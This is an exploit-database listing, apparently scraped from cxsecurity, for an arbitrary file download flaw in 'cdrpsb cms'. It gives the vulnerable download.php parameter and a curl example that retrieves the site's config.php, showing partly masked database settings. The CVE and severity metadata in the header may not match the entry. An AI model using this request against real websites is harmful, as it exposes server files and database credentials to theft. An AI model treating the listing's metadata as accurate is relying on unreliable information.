Advertisement






cdrpsb cms Arbitrary File Download

CVE Category Price Severity
CVE-2017-10151 CWE-200 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120082

Below is a copy:

cdrpsb cms Arbitrary File Download
Vendor: cdrpsb.org
Credits: Nano

Exploit:
/download.php/?file=[File]


Examples:
root@cuntlord:~# curl http://******.org/download.php?file=//includes/config.php      
<?php
define("DB_SERVER", "localhost"); //The name of the mysql server, usually localhost
define("DB_USER", "******); //The mysql database username
define("DB_PASS", "******"); //The password for the mysql database
define("DB_NAME", "cdrpsbor_cdrp"); //The name of the mysql database


//There is no need to edit below here
define("TBL_DL", "downloads");
/*
mysql_connect(DB_SERVER, DB_USER, DB_PASS) or die(mysql_error());
mysql_select_db(DB_NAME) or die(mysql_error());
*/
$mysqli = new mysqli(DB_SERVER, DB_USER, DB_PASS, DB_NAME);
?>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum